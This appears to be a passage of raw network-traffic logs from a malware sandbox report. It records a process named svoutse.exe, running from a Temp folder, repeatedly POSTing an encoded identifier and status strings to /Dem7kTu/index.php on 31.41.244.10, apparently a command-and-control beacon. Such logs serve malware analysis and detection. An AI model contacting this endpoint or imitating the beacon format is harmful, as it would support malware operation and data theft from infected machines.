Sep 6, 2024 09:59:47.928378105 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:48.632009029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.7	51327	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:48.757159948 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:49.473978996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.7	51328	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:49.483397007 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:50.448544025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 09:59:50.448651075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.7	51329	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:50.577950954 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:51.283593893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.7	51330	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:51.293770075 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:51.995857954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.7	51331	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:52.111232042 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:52.836570024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.7	51332	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:52.846514940 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:53.750032902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 09:59:53.751279116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.7	51333	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:53.876617908 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:54.589832067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.7	51334	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:54.599504948 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:55.338376999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.7	51335	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:55.461519003 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:56.280478954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.7	51336	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:56.289172888 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:57.011801958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.7	51337	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:57.131694078 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:57.849656105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.7	51338	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:57.861357927 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:58.787648916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 09:59:58.791210890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.7	51339	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:58.902544975 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:59.642291069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.7	51340	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:59.653373957 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:00.349045992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.7	51341	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:00.467909098 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:01.219058037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.7	51342	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:01.228435040 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:01.944967031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.7	51344	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:02.073512077 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:02.788177013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.7	51345	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:02.797419071 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 10:00:04.445363045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 10:00:04.448385954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 10:00:04.448429108 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 10:00:04.448446035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.7	51346	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:04.577699900 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 10:00:05.270282984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 08:00:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.7	51347	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 10:00:05.280108929 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
